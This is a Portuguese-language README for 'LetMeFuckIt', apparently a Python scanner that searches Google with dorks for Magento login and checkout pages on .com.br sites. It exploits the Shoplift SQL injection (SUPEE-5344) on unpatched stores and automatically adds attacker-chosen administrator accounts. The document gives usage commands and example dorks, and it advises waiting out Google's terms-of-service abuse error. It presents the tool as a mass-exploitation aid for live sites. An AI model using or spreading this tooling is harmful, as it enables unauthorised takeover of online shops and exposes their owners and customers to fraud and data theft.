Scanner and Exploit Magento
O Scanner explora a vulnerabilidade SQLi Vulnerability (1.9.1.0 CE) do Magento.
A vulnerabilidade foi corrigida no Patch SUPEE-5344, entretanto, o scanner serve para localizar e testar os sitemas que não aplicaram o patch de segurança.
O LetMeFuckIt foi escrito em Python e utiliza as seguintes bibliotecas:
pygoogle, argparse, urllib2, requests, base64
letmefuckit.py --dork <dork> --pages <number> --user <user> --pwd <pass>
letmefuckit.py --dork "inurl:customer/account/login/ site:com.br" --pages 4 --user adm --pwd pass
--dork --user --pwd --pages --help
"inurl:/customer/account/login site:com.br"
"inurl:/checkout/onepage/ site:com.br"
Através da dork inserida, é feita uma varredura no Google, as urls são salvas no arquivo urls.txt, que posteriormente são automaticamente testadas.
Os usuários fornecidos na execução são adicionados automaticamente como administradores nos sites vulneráveis.
Caso você se depare com o erro abaixo, é porque o scanner utiliza a biblioteca pygoogle, a biblioteca está desatualizada com o novo sistema de API's do Google, pois agora é necessário uma Key para utilizar a api.
pygoogle ERROR __search__| responseDetails : Suspected Terms of Service Abuse. Please see http://code.google.com/apis/errors
Se o erro aparecer, apenas aguarde 1 minuto ou 2. O Scanner voltará ao normal.
Exploit: Magento Shoplift exploit (SUPEE-5344) by Manish Kishan Tanwar AKA error1046 in 25/08/2015
LetMeFuckIt Scanner AutoPwned por OntheFrontLine in 27/09/2015